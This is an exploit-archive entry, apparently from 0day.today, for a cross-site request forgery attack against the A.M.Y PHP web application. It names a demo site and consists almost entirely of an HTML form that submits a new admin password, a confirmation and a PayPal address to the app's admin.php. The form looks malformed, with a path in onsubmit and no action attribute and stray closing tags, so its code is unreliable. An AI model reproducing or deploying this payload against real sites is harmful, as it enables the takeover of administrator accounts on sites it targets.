A.M.Y CSRF (change admin password)

2012-03-11T00:00:00
ID 1337DAY-ID-17659
Type zdt
Reporter Jonturk75
Modified 2012-03-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: A.M.Y CSRF (change admin password)
# Author: Jonturk75
# Category:: webapps
# Demo site: http://calendarscripts.info/demos/amy/admin.php


<form onsubmit="amy/admin.php;" method="post">
<input type="password" size="30" name="adminpass"/></p>
<input type="password" size="30" name="repass"/></p>
<input type="hidden" value="1" name="changepass"/>
<p><input type="checkbox" checked="" value="1" name="email_on_signup"/> Email me when a new advertiser signs up.</p>
<input type="text" size="30" value="[email protected]" name="paypal"/></p>
<p align="center"><input type="submit" value="Save Settings"/></p> 



#  0day.today [2018-04-09]  #